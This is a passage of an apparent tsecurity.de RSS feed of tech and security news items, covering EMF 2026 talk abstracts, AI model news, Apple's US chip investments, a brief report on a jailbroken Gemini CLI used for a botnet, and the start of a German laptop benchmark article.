<li>fix(kimi): surface the 5h usage window reset time by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iacore/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iacore">@iacore</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4916567403" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5953" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5953/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5953">#5953</a></li>
<li>fix(mnemopi): lighter dispose consolidation so /quit returns quickly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iacore/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iacore">@iacore</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4837166232" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4843" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4843/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4843">#4843</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iacore/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iacore">@iacore</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4916567403" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/5953" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/5953/hovercard" href="https://github.com/can1357/oh-my-pi/pull/5953">#5953</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v17.0.3...v17.0.4"><tt>v17.0.3...v17.0.4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Hassle Hurdle: a philosophy to hack ADHD (emf2026)]]></title>
<description><![CDATA[Eight years ago a 5 second bit in a YouTube video led me to develop a generalised philosophy on how to design coping mechanisms for my ADHD: The Hassle Hurdle. Ever since then I've been continuously using and improving the philosophy to manage the symptoms of my ADHD, and my quality of life in ge...]]></description>
<link>https://tsecurity.de/de/3676646/it-security-video/the-hassle-hurdle-a-philosophy-to-hack-adhd-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676646/it-security-video/the-hassle-hurdle-a-philosophy-to-hack-adhd-emf2026/</guid>
<pubDate>Fri, 17 Jul 2026 19:19:22 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eight years ago a 5 second bit in a YouTube video led me to develop a generalised philosophy on how to design coping mechanisms for my ADHD: The Hassle Hurdle. Ever since then I've been continuously using and improving the philosophy to manage the symptoms of my ADHD, and my quality of life in general.

In the talk I'll introduce the three rules of the philosophy, how they came about, and suggest ways of implementing them.

The talk will then cover some common lessons and pitfalls that I've discovered along the way, before finishing with some recommendations of practical tools, software-based tools and finally some 'Oh no I'm too good at computers and can bypass any distraction blocking software I try' tools.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/236-the-hassle-hurdle-a-philosophy-to-hack-adhd]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking APRS to warm my camper van whilst I’m still in the pub (emf2026)]]></title>
<description><![CDATA[This brief talk will describe a personal remote-control protocol that can be run over APRS and potentially other similar location messaging protocols. APRS is an amateur VHF/UHF ad-hoc, wide area, resilient digital mesh network relaying position information. Amateur APRS networks operate using AX...]]></description>
<link>https://tsecurity.de/de/3676644/it-security-video/hacking-aprs-to-warm-my-camper-van-whilst-im-still-in-the-pub-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676644/it-security-video/hacking-aprs-to-warm-my-camper-van-whilst-im-still-in-the-pub-emf2026/</guid>
<pubDate>Fri, 17 Jul 2026 19:19:20 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This brief talk will describe a personal remote-control protocol that can be run over APRS and potentially other similar location messaging protocols. APRS is an amateur VHF/UHF ad-hoc, wide area, resilient digital mesh network relaying position information. Amateur APRS networks operate using AX25 packet radio at 144 &amp; 432MHz and can have a similar range per node to UHF LoRa and Meshtastic networks. I designed this protocol to remotely operate appliances in my house or my van, all within the terms of the amateur licence, without the use of public cellular networking or Internet WiFi nodes.
 
My requirement was for a cheap off-the-shelf means to relay data two ways from inside a pub to my camper van 2-3 miles distant. The talk will include a description of the overlay protocol and its implementation using a Raspberry Pi Zero and a cheap Baofeng handy talkie (HT). I will explain how a couple of simple Bash scripts running over Direwolf on the Pi translate my adapted APRS messages and then are used to control a wide range of electrical appliances. The talk includes a demonstration of remote control of a couple of units in my van which is located some distance away.
 
The talk will focus on APRS, and a theoretical and practical comparison will be made between APRS running over conventional AFSK and over LoRa. Other options including Meshtastic on the licence free and other frequencies will be covered.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/156-hacking-aprs-to-warm-my-camper-van-whilst-i-m-still-in-the]]></content:encoded>
</item>
<item>
<title><![CDATA[(g+) AI: DeepSeek Champions China's Bid to Flood the World With Cheap AI]]></title>
<description><![CDATA[On a video conference call from Hangzhou earlier this year, one of China's hottest startups held a four-hour pitch meeting with potential venture investors that was unusual by almost any measure. Von Saritha Rai und Olivia Poh (Deepseek, KI)]]></description>
<link>https://tsecurity.de/de/3676569/it-nachrichten/g-ai-deepseek-champions-chinas-bid-to-flood-the-world-with-cheap-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676569/it-nachrichten/g-ai-deepseek-champions-chinas-bid-to-flood-the-world-with-cheap-ai/</guid>
<pubDate>Fri, 17 Jul 2026 18:08:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[On a video conference call from Hangzhou earlier this year, one of China's hottest startups held a four-hour pitch meeting with potential venture investors that was unusual by almost any measure. Von Saritha Rai und Olivia Poh (<a href="https://www.golem.de/specials/deepseek/">Deepseek</a>, <a href="https://www.golem.de/specials/ki/">KI</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=211023&amp;page=1&amp;ts=1784303941" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[The Right Amount of Spec for Agentic Development]]></title>
<description><![CDATA[I keep seeing the same idea in conversations about agents: detailed specs are old-world overhead now. Give the model a rough goal, let it explore, fix what comes back, move on. It sounds efficient but it also hides the cost. A simple prompt looks cheap and tempting because it gets implementation ...]]></description>
<link>https://tsecurity.de/de/3675801/ai-nachrichten/the-right-amount-of-spec-for-agentic-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675801/ai-nachrichten/the-right-amount-of-spec-for-agentic-development/</guid>
<pubDate>Fri, 17 Jul 2026 12:48:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I keep seeing the same idea in conversations about agents: detailed specs are old-world overhead now. Give the model a rough goal, let it explore, fix what comes back, move on. It sounds efficient but it also hides the cost. A simple prompt looks cheap and tempting because it gets implementation started right away. Then […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Nothing Phone (3) gets another price cut at Amazon — is this under-rated phone now a better buy than the Pixel 10, Galaxy S25, or iPhone 17?]]></title>
<description><![CDATA[We're big fans of the Nothing Phone (3) at TechRadar — especially when it's going this cheap at Amazon.]]></description>
<link>https://tsecurity.de/de/3675738/it-nachrichten/nothing-phone-3-gets-another-price-cut-at-amazon-is-this-under-rated-phone-now-a-better-buy-than-the-pixel-10-galaxy-s25-or-iphone-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675738/it-nachrichten/nothing-phone-3-gets-another-price-cut-at-amazon-is-this-under-rated-phone-now-a-better-buy-than-the-pixel-10-galaxy-s25-or-iphone-17/</guid>
<pubDate>Fri, 17 Jul 2026 12:33:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We're big fans of the Nothing Phone (3) at TechRadar — especially when it's going this cheap at Amazon.]]></content:encoded>
</item>
<item>
<title><![CDATA[Prime Day might be over but these 21 deals under AU$50 prove you don't need a major sale to upgrade your tech]]></title>
<description><![CDATA[Amazon Prime Day has come and gone, but there are still plenty of cheap tech upgrades up for grabs, with discounts of up to 71%.]]></description>
<link>https://tsecurity.de/de/3675122/it-nachrichten/prime-day-might-be-over-but-these-21-deals-under-au50-prove-you-dont-need-a-major-sale-to-upgrade-your-tech/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675122/it-nachrichten/prime-day-might-be-over-but-these-21-deals-under-au50-prove-you-dont-need-a-major-sale-to-upgrade-your-tech/</guid>
<pubDate>Fri, 17 Jul 2026 07:32:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon Prime Day has come and gone, but there are still plenty of cheap tech upgrades up for grabs, with discounts of up to 71%.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi's open model K3 nears GPT-5.6 Sol and Fable 5 while signaling the end of super cheap Chinese AI]]></title>
<description><![CDATA[Kimi is launching K3, a multimodal open-weight model with 2.8 trillion parameters and one million tokens of context. In the company's own benchmarks, it comes close to Claude Fable 5 and GPT 5.6 Sol while beating Opus 4.8 and GLM 5.2, in some cases by a wide margin. The model is also significantl...]]></description>
<link>https://tsecurity.de/de/3674581/ai-nachrichten/kimis-open-model-k3-nears-gpt-56-sol-and-fable-5-while-signaling-the-end-of-super-cheap-chinese-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674581/ai-nachrichten/kimis-open-model-k3-nears-gpt-56-sol-and-fable-5-while-signaling-the-end-of-super-cheap-chinese-ai/</guid>
<pubDate>Thu, 16 Jul 2026 22:18:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1500" height="857" src="https://the-decoder.com/wp-content/uploads/2026/07/kimi_k3_web.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Kimi is launching K3, a multimodal open-weight model with 2.8 trillion parameters and one million tokens of context. In the company's own benchmarks, it comes close to Claude Fable 5 and GPT 5.6 Sol while beating Opus 4.8 and GLM 5.2, in some cases by a wide margin. The model is also significantly pricier than its predecessor. Full weights are scheduled for release by July 27.</p>
<p>The article <a href="https://the-decoder.com/kimis-open-model-k3-nears-gpt-5-6-sol-and-fable-5-while-signaling-the-end-of-super-cheap-chinese-ai/">Kimi's open model K3 nears GPT-5.6 Sol and Fable 5 while signaling the end of super cheap Chinese AI</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is Apple bringing chip manufacturing home?]]></title>
<description><![CDATA[Apple’s recently announced $30 billion multi-year agreement with Broadcom is significant because it means billions of chips for Apple devices will be made in the US, supporting hundreds of jobs. 



This is Apple’s biggest US procurement deal so far, but it won’t be the last; when it announced th...]]></description>
<link>https://tsecurity.de/de/3674332/it-nachrichten/is-apple-bringing-chip-manufacturing-home/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674332/it-nachrichten/is-apple-bringing-chip-manufacturing-home/</guid>
<pubDate>Thu, 16 Jul 2026 20:02:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Apple’s recently announced $<a href="https://www.applemust.com/apples-30b-broadcom-deal-returns-iphone-chip-manufacture-to-us/" target="_blank" rel="noreferrer noopener">30 billion multi-year agreement with Broadcom</a> is significant because it means <a href="https://www.computerworld.com/article/4167296/apple-cant-make-chips-fast-enough-but-thats-only-part-of-the-story.html">billions of chips</a> for Apple devices will be made in the US, supporting hundreds of jobs. </p>



<p class="wp-block-paragraph">This is Apple’s biggest US procurement deal so far, but it won’t be the last; when it announced the arrangement, Apple confirmed it is, “working with the administration and businesses across the US to help create an end-to-end silicon supply chain in America.”</p>



<p class="wp-block-paragraph">That statement implies that the 15 billion chips Broadcom will produce won’t be the only processors in Apple devices to carry tiny little “Made in the USA” slogans. Broadcom is making custom silicon components and wireless connectivity technologies such as RF/wireless chips (Wi-Fi, Bluetooth, cellular, FBAR filters) and ASIC work, rather than application processors. But they are still chips for Apple devices.</p>



<h2 class="wp-block-heading"><strong>TSMC doubles down</strong></h2>



<p class="wp-block-paragraph">That’s why it is significant that <a href="https://www.datacenterdynamics.com/en/news/tsmc-announces-additional-100bn-investment-in-arizona-as-chipmaker-posts-402bn-revenue-for-q2-2026/" target="_blank" rel="noreferrer noopener">TSMC confirmed plans</a> to extend its own manufacturing in America. It already has a $165 billion US commitment; now, it is investing an additional $100 billion in four more chip plants — including one dedicated to churning out the company’s most advanced 2nm (and smaller) processors. </p>



<p class="wp-block-paragraph">“We believe this investment will help to further foster the development of the US semiconductor ecosystem, strengthen the supply chain, and support an increasing number of high-tech, high-paying jobs in the United States,”  CEO C.C. Wei told analysts.</p>



<p class="wp-block-paragraph">TSMC has also confirmed plans to invest in packaging facilities for processors, which is basically the process where memory, processor, and networking nodes can all be combined and packaged on the chip. That sort of packaging is needed to make the final SoC chip. That means TSMC factories in the US will be able to churn out the advanced processors used in Apple’s current and, presumably, future devices.</p>



<h2 class="wp-block-heading"><strong>The bill so far</strong></h2>



<p class="wp-block-paragraph">That’s three investments — in processor manufacturing, packaging, and Broadcom radios and chips — all of which are strategically important to Apple devices. TSMC makes the brains, Broadcom brings the connectivity. Total value so far: $295 billion, around 1.5 times Apple’s annual revenue in the Americas.</p>



<p class="wp-block-paragraph">It isn’t all about Apple. TSMC has other clients, and Apple is <a href="https://www.computerworld.com/article/4118123/apple-silicon-as-demand-grows-is-tsmc-driving-a-harder-bargain.html">no longer the company’s biggest customer</a> thanks to the drive to AI. But it is still an important one. That means at least some of TSMC’s newly invested US manufacturing capacity will be dedicated to making chips for Apple. The open question is how much US-manufactured chips will <a href="https://www.applemust.com/uh-oh-tsmc-price-hike-means-apple-silicon-is-also-getting-more-expensive/#google_vignette" target="_blank" rel="noreferrer noopener">cost in contrast to those made elsewhere</a>.</p>



<h2 class="wp-block-heading"><strong>It’s bigger than two deals</strong></h2>



<p class="wp-block-paragraph">These aren’t the only chip-focused partnerships Apple has made domestically. Apple’s American Manufacturing Program (AMP) launched in August 2025 as part of a $600 billion  four-year US investment commitment. TSMC and Broadcom were both named AMP partners, but they weren’t alone, and some arrangements have already been announced:</p>



<ul class="wp-block-list">
<li>GlobalFoundries is bringing mixed-signal chip manufacturing to make advanced ICs for Face ID.</li>



<li>Texas Instruments expanded production for analog/power chips.</li>



<li>Samsung is making a new chip-making process at its Austin, TX fab, described by Apple as having “never been used before anywhere in the world.”</li>



<li>Apple became the “first and largest customer” of <a href="https://www.computerworld.com/article/3547197/apple-amkor-and-tsmc-neath-the-arizona-skies.html">Amkor’s new advanced packaging/test facility in Arizona</a>.</li>



<li>Corning is expanding glass production.</li>



<li>Applied Materials is making chip manufacturing equipment under AMP.</li>
</ul>



<p class="wp-block-paragraph">Bundle all these deals together and it’s crystal clear that Apple’s $600 billion investment is at least in part focused on the technologically advanced components on which its devices are built. These components also have the advantage in being incredibly small, which means they are easy and cheap to ship for final assembly at increasingly automated final production locations worldwide. </p>



<h2 class="wp-block-heading"><strong>So, is it coming home?</strong></h2>



<p class="wp-block-paragraph">That’s the strategy: keep the high-value, hard-to-automate work — and the jobs it requires — in America, while leaving final assembly flexible enough to go wherever that makes sense now or in the future. Is Apple bringing manufacturing home? Partially, in that the bits that matter the most — brains and networking— are coming back, even if assembly is not.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>, <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a>, and subscribe to the human-curated daily Apple news briefing at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[6 cheap kitchen gadgets that will make your life easier for under $20 (I promise)]]></title>
<description><![CDATA[These kitchen gadgets won't break the bank, but will seriously upgrade your cooking.]]></description>
<link>https://tsecurity.de/de/3674059/it-nachrichten/6-cheap-kitchen-gadgets-that-will-make-your-life-easier-for-under-20-i-promise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674059/it-nachrichten/6-cheap-kitchen-gadgets-that-will-make-your-life-easier-for-under-20-i-promise/</guid>
<pubDate>Thu, 16 Jul 2026 18:18:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[These kitchen gadgets won't break the bank, but will seriously upgrade your cooking.]]></content:encoded>
</item>
<item>
<title><![CDATA[FOSS Weekly #26.29: Mint Goes Wayland, OpenBook Reader, Terminal Shortcut Tips, Linux Handheld Computers and More]]></title>
<description><![CDATA[Is wayland slow?]]></description>
<link>https://tsecurity.de/de/3673668/unix-server/foss-weekly-2629-mint-goes-wayland-openbook-reader-terminal-shortcut-tips-linux-handheld-computers-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673668/unix-server/foss-weekly-2629-mint-goes-wayland-openbook-reader-terminal-shortcut-tips-linux-handheld-computers-and-more/</guid>
<pubDate>Thu, 16 Jul 2026 15:46:13 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Is wayland slow?]]></content:encoded>
</item>
<item>
<title><![CDATA[BSD Release: OPNsense 26.7]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The OPNsense project develops a FreeBSD-based specialist operating system (and a fork of pfSense) designed for firewalls and routers. The latest version of OPNsense is 26.7 which is based on FreeBSD 15.1 and introduces a number of ...]]></description>
<link>https://tsecurity.de/de/3673449/unix-server/bsd-release-opnsense-267/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673449/unix-server/bsd-release-opnsense-267/</guid>
<pubDate>Thu, 16 Jul 2026 14:32:04 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The OPNsense project develops a FreeBSD-based specialist operating system (and a fork of pfSense) designed for firewalls and routers. The latest version of OPNsense is 26.7 which is based on FreeBSD 15.1 and introduces a number of behind-the-scenes changes: "The first implementation of the new Interface Assignments framework....]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor known as “bandcampro” used a jailbroken Gemini CLI, Google’s open-source terminal-based AI agent, to deploy and operate a small command-and-control (C2) botnet, according to TrendAI. Operational overview (Source: TrendAI) In more than 200 sessions between March 19 ...]]></description>
<link>https://tsecurity.de/de/3673407/it-security-nachrichten/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673407/it-security-nachrichten/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor known as “bandcampro” used a jailbroken Gemini CLI, Google’s open-source terminal-based AI agent, to deploy and operate a small command-and-control (C2) botnet, according to TrendAI. Operational overview (Source: TrendAI) In more than 200 sessions between March 19 and April 21, 2026, the threat actor worked with Gemini to deploy and operate infrastructure that controlled eight computers inside a dental clinic and gain access to the clinic’s OpenDental database. Posing as an … <a href="https://www.helpnetsecurity.com/2026/07/16/jailbroken-google-gemini-cli-botnet/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/jailbroken-google-gemini-cli-botnet/">Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Will cheap specialised AI models threaten the Big Tech chokehold?]]></title>
<description><![CDATA[Chinese models trained with domain expertise could best American counterparts at a fraction of the cost]]></description>
<link>https://tsecurity.de/de/3673403/ai-nachrichten/will-cheap-specialised-ai-models-threaten-the-big-tech-chokehold/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673403/ai-nachrichten/will-cheap-specialised-ai-models-threaten-the-big-tech-chokehold/</guid>
<pubDate>Thu, 16 Jul 2026 14:19:23 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Chinese models trained with domain expertise could best American counterparts at a fraction of the cost]]></content:encoded>
</item>
<item>
<title><![CDATA[Ich habe 7 Jahre alten Laptop getestet – jetzt stelle ich die Upgrade-Zyklen bei PCs in Frage]]></title>
<description><![CDATA[Die erste Überraschung gab es bereits, bevor ich überhaupt einen Browser-Tab geöffnet hatte: Der sieben Jahre alte Microsoft Surface Laptop 3 startete schneller als die brandneuen Geräte, mit denen ich ihn hier vergleichen wollte. Die besten Notebooks aller Klassen finden Sie in unserem Vergleich...]]></description>
<link>https://tsecurity.de/de/3673098/it-nachrichten/ich-habe-7-jahre-alten-laptop-getestet-jetzt-stelle-ich-die-upgrade-zyklen-bei-pcs-in-frage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673098/it-nachrichten/ich-habe-7-jahre-alten-laptop-getestet-jetzt-stelle-ich-die-upgrade-zyklen-bei-pcs-in-frage/</guid>
<pubDate>Thu, 16 Jul 2026 12:32:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die erste Überraschung gab es bereits, bevor ich überhaupt einen Browser-Tab geöffnet hatte: Der sieben Jahre alte <a href="https://www.pcwelt.de/article/1183918/test-microsoft-surface-laptop3-notebook.html" target="_blank" rel="noreferrer noopener">Microsoft Surface Laptop 3</a> startete schneller als die brandneuen Geräte, mit denen ich ihn hier vergleichen wollte. <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen finden Sie in unserem Vergleichstest.</a></p>



<p>Das hätte eigentlich nicht passieren dürfen. Immer wenn den Herstellern nur wenig zu den Verbesserungen gegenüber der Vorgängergeneration einfällt, greifen sie zu einem bewährten Vergleich: Wie schneidet der neue PC im Vergleich zu einem fünf Jahre alten Modell ab?</p>



<p>Das ist eine sichere Wette. Egal, wie wenige Verbesserungen ein neuer Chip bietet, er wird immer besser sein als ein PC aus längst vergangenen Zeiten. Neu ist eben immer besser, oder? Normalerweise gilt dieser simple Grundsatz. Aber angesichts der angespannten Weltlage kann einem der Neukauf eines Computers schnell verhagelt werden. Daher stellt sich eine Frage: Kann man Geld sparen, wenn man einen älteren Laptop behält oder diesen gebraucht kauft? Und worauf muss man bei dieser Sparmaßnahme verzichten?</p>



<p>Ich habe dafür unsere Lager durchforstet und eine Sammlung neuer und älterer Laptops in unser Testlabor geschleppt. Mit diesem Versuch wollte ich herausfinden, ob die PC-Hersteller mit ihren Lobeshymnen auf neue Geräte tatsächlich die Wahrheit sagen.</p>



<p>Mit meinen Erkenntnissen will ich Ihnen weder einen neuen Laptop verkaufen noch mich dafür aussprechen, alte Geräte einfach weiterzuverwenden. Ich habe lediglich versucht, weitverbreitete Geräte unter verschiedenen Szenarien miteinander zu vergleichen. Dies soll die Vorteile von Neugeräten und älteren Modellen aufzeigen. Dabei habe ich mich auf die folgenden Punkte konzentriert: Boot-Zeit, die Zeit zum Exportieren einer PDF-Datei oder die Zeit für das Entpacken eines Archivs. Mit diesen Ergebnissen können Sie selbst entscheiden, ob Sie durch den Neukauf tatsächlich viel Zeit gewinnen werden.</p>



<p>Eigentlich wollte ich dafür Geräte nutzen, die maximal fünf Jahre alt sind. Doch ich konnte in unserem Lager nur einen wenig gebrauchten, sieben Jahre alten Laptop ausfindig machen: den <a href="https://www.pcwelt.de/article/1183918/test-microsoft-surface-laptop3-notebook.html" target="_blank" rel="noreferrer noopener">Microsoft Surface Laptop 3</a>. Dieses Gerät stammt noch aus Zeiten vor der Corona-Pandemie. Dieses Urgestein habe ich mit mehreren modernen Laptops verglichen: dem Asus ZenBook (UX3607OA) mit einem <a href="https://www.pcwelt.de/article/3123457/qualcomm-snapdragon-x2-elite-streaming-test.html" target="_blank" rel="noreferrer noopener">Snapdragon X2 Elite Extreme</a> und Windows auf ARM-Basis sowie mit dem Asus ZenBook Duo mit einem <a href="https://www.pcwelt.de/article/3042853/intel-panther-lake-cpu-core-ultra-x9-388h-test.html" target="_blank" rel="noreferrer noopener">Intel Core Ultra 300 (Panther Lake)</a> der Spitzenklasse. Beide sind erst in diesem Jahr auf den Markt gekommen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75d2ab"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Microsoft-Surface-Laptop-3-Core-Ice-Lake.png?w=1200" alt="Microsoft Surface Laptop 3 Core Ice Lake" class="wp-image-3142825" width="1200" height="940" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der Surface Laptop 3 wurde noch mit Windows 10 ausgeliefert, aber mittlerweile auf Windows 11 aktualisiert.</figcaption></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Es stellt sich die Frage: Können die neuen Modelle besser abschneiden? Lohnt sich dieser Vorsprung? Bilden Sie sich selbst ein Urteil.</p>



<h2 class="wp-block-heading toc">Der alte Laptop startet schneller</h2>



<p>Mein erster Test: die Startzeit. Die Ära der Festplatten liegt längst hinter uns. Die Geschwindigkeit des Hochfahrens hängt daher primär vom Tempo der verbauten SSD ab. Auch die Anzahl der Anwendungen, die beim Start geladen werden müssen, spielt eine Rolle.</p>



<p>Für diesen Test habe ich alle Startanwendungen deaktiviert. Ausnahmen galten lediglich für vorinstallierte Programme wie Asus Mouse Agent, Microsoft Defender, Edge, OneDrive und Teams. Damit die Ergebnisse vergleichbar bleiben, habe ich sonst genutzte Anwendungen wie mein VPN weggelassen. Daraufhin folgten fünf Neustarts, bei denen ich jeweils gemessen habe, wie lange es dauert, bis der Windows-Desktop vollständig geladen war. Auch die Anmeldung über Windows Hello wurde einbezogen.</p>



<p>Auf den meisten Laptops ist Microsoft Edge nicht im Autostart „vorinstalliert“. Dies kann man jedoch über das Einstellungsmenü von Microsoft Edge aktivieren. Dadurch startet der Browser deutlich schneller. Im Gegenzug verlängerte sich die Startzeit des Laptops aber um etwa drei Sekunden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58b2f75d9e2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/image_45e283.png?w=1200" alt="" class="wp-image-3141109" width="1200" height="521" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
